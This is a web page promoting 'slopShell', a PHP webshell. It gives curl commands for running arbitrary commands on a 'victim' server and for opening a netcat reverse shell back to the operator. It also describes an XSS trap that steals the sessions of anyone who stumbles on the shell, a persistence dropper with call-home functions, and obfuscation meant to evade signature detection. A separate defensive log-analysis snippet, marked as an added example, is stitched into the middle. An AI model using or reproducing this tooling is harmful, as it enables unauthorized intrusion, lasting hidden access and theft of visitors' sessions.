slopShell - The Only Php Webshell You Need | Crackcodes.in


All the information provided on this site is for educational purposes only. The site is in no way responsible for any misuse of the information. The word “Hack” or “Hacking” that is used on this site shall be regarded as “Ethical Hack” or “Ethical Hacking” respectively.

What Is slopShell?

SlopShell is a PHP webshell.

Since I derped and forgot to talk about usage, here goes.

For this shell to work, you need two things: a victim that allows PHP file upload (yourself, in an educational environment) and a way to send HTTP requests to this webshell.

Thank you for all the support the community has given; it means a lot to us. Now for things that will be added to this shell, to make it even more awesome:
  • Mutual TLS, with the ability to generate a CA on the fly (if that's possible)
  • More refined dropper/shell itself, to ensure that the shell will not be stumbled upon for prolonged access


Setup And Installation

OK, so here we go folks: there was an itch I had to write something in PHP, so this is it. This webshell has a few bells and whistles, and more are added every day. You will need a pgsql server running that you control. However you implement that is on you.

In Debian:-
apt install -y postgresql php php-pear && python -m pip install proxybroker --user

In RHEL Systems:-

dnf -y -b install postgresql-server postgresql php php-pear && python -m pip install proxybroker --user

In Windows:- 

Install the PHP MSI, and make sure you have an active PostgreSQL server that you can connect to running somewhere. Figure it out.

Once you have these set up properly and can confirm that they are running, a command I would encourage using is pg_ctl: you can create the DB that way, or at least init it and start it. Then all the DB queries will work fine.

How to interact.

Firstly, you need to choose a valid User-Agent to use; this is kind of like a first layer of protection against your webshell being accidentally stumbled upon by anyone but you. I went with sp/1.1 as it's a non-typical user-agent. This can cause red flags in a pentest, and your access or script to be blocked or deleted. So, be smart about it. Code obfuscation wouldn't hurt; I did not add that in because that's on you to decide. To use the shell, there are some presets to aid you in your pen test and traversal of the machine. I did not add much for Windows, because I do not like developing for Windows. If you have routines or tricks to add or know about, feel free to submit an issue with your suggestion and I'll add it. An example of how to use this webshell with curl:

curl https://victim/slop.php?qs=cqP -H "User-Agent: sp/1.1" -v

or to execute custom commands:

curl https://victim/slop.php --data "commander=id" -H "User-Agent: sp/1.1" -v 

Or to attempt to establish a reverse shell to your machine:

curl https://victim/slop.php --data "rcom=1&mthd=nc&rhost=&rport=&shell=sh" -H "User-Agent: sp/1.1" -v 

  • mthd = the method you want to use to establish the reverse shell. It is predefined in the $comma array (feel free to add to it) and is optional; if it is null, the script will choose for you.
  • rhost = you. This and rport are not required, as the script defaults to using netcat with the IP address in the $_SERVER["REMOTE_ADDR"] PHP env variable.
  • rport = your listener port; the default was set to 1634, just because.
  • shell = the type of system shell you want to have. I know bash isn't standard on all systems, but that's why it's nice for you to do some system recon before you try to execute this command.

Here is the better part of this shell. If someone happens upon this shell without supplying the exact user agent string specified in the script, this shell will produce a 500 error with a fake error page, then it will attempt some XSS to steal that user's session information and send it back to a handler script on your server/system. This will then attempt to store the information in a running log file. If it is unable to do so, well, the backup is your logs. Once the XSS has completed, this shell will redirect the user back to the root (/) of the webserver. So, you'll steal sessions if someone finds this, can even beef it up to execute commands on the server on behalf of the user, or drop a reverse shell on the user's browser through Beef or another method. The possibilities are legit endless.
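
From the defender's side, the behaviour described above leaves a trace in ordinary access logs: one .php path that returns 500 to browsers but 2xx to a single non-browser User-Agent. The following is an added example, not part of slopShell or the original post; the log lines, the /uploads/ path and the function name find_ua_gated_scripts are constructed for illustration, and sp/1.1 is only the default the page names.

```python
import re
from collections import defaultdict

# Constructed sample lines in Apache/nginx "combined" format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2021:10:01:02 +0000] "GET /uploads/slop.php?qs=cqP HTTP/1.1" 200 512 "-" "sp/1.1"
203.0.113.7 - - [10/Mar/2021:10:01:09 +0000] "POST /uploads/slop.php HTTP/1.1" 200 87 "-" "sp/1.1"
198.51.100.23 - - [10/Mar/2021:11:15:40 +0000] "GET /uploads/slop.php HTTP/1.1" 500 1310 "-" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.23 - - [10/Mar/2021:11:15:41 +0000] "GET / HTTP/1.1" 200 4096 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.0.2.50 - - [10/Mar/2021:11:20:00 +0000] "GET /index.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0 (Windows NT 10.0)"
192.0.2.51 - - [10/Mar/2021:11:21:00 +0000] "GET /index.php HTTP/1.1" 200 4096 "-" "curl/7.68.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
BROWSER_RE = re.compile(r"Mozilla/|Chrome/|Safari/|Firefox/")
# Default User-Agent named on this page; an operator can change it, so it is only a hint.
KNOWN_UAS = {"sp/1.1"}


def find_ua_gated_scripts(log_text):
    """Return {path: finding} for .php paths that answer a non-browser
    User-Agent with 2xx while browsers get 500 on the same path, or that are
    requested with a known webshell User-Agent."""
    per_path = defaultdict(lambda: {"ok_nonbrowser": set(), "err_browser": 0, "known_ua": False})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip malformed lines
        path = m["target"].split("?", 1)[0]
        if not path.lower().endswith(".php"):
            continue
        ua, status, rec = m["ua"], int(m["status"]), per_path[path]
        is_browser = bool(BROWSER_RE.search(ua))
        if ua in KNOWN_UAS:
            rec["known_ua"] = True
        if 200 <= status < 300 and not is_browser:
            rec["ok_nonbrowser"].add(ua)
        elif status == 500 and is_browser:
            rec["err_browser"] += 1
    findings = {}
    for path, rec in per_path.items():
        gated = bool(rec["ok_nonbrowser"]) and rec["err_browser"] > 0
        if gated or rec["known_ua"]:
            findings[path] = {"ua_gated": gated, "known_ua": rec["known_ua"],
                              "user_agents": sorted(rec["ok_nonbrowser"])}
    return findings
```

POST bodies such as commander= do not appear in a combined-format access log, so the status/User-Agent split on a single path is the signal to alert on.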

Images of use cases

In browser, navigated to without the proper user-agent string (1st level of auth):
[Image: in browser]

Use in the terminal, which is how this was designed to work, using curl with the -vH "User-Agent: sp1.1" switches.

Obfuscated script example:
[Image: obfuscated script]

Generation 2 obfuscated script:
[Image: generation 2 obfuscated]

Interacting through the client script

Once the client script is complete, you as the operator will not need to interact through curl to utilize this shell. There will be a client script that you can use to execute all commands/control over. In addition to this client script, there is a dropper. This dropper will ensure the script is run at start up even if the website is removed. It includes some call-home functions and obfuscation, if requested, on a level from 1 to 3, with 3 being the highest: every function will be rot ciphered and then encoded in base64, with the whole file then base64 encoded and a random name assigned to the file itself. This can help avoid signature detection.


Once the encryption routine is fully worked out, the dropper script will be encrypted, and highly obfuscated. Example output:

Base64 decoded: also a test 123

Re-Encoded: YWxzbyBhIHRlc3QgMTIz

Key: 4212bd1ff1d366f23ca77021706a9a29cb824b45f82ae312bcf220de68c76760289f1d5550aa341002f1cfa9831e871e
Key Length: 96
Encryption Result:
    [original] => also a test 123
    [key] => 4212bd1ff1d366f23ca77021706a9a29cb824b45f82ae312bcf220de68c76760289f1d5550aa341002f1cfa9831e871e
    [encrypted] => meIHs/y6_U7U~7(M
    [base64_Encoded] => bWVJSAAdcw4veTZfVQU3VX43KE0=
Decrypt Test:
    [key] => 4212bd1ff1d366f23ca77021706a9a29cb824b45f82ae312bcf220de68c76760289f1d5550aa341002f1cfa9831e871e
    [encrypted] => meIHs/y6_U7U~7(M
    [decrypted] => YWxzbyBhIHRlc3QgMTIz
    [base64_decoded] => also a test 123
    [original] => also a test 123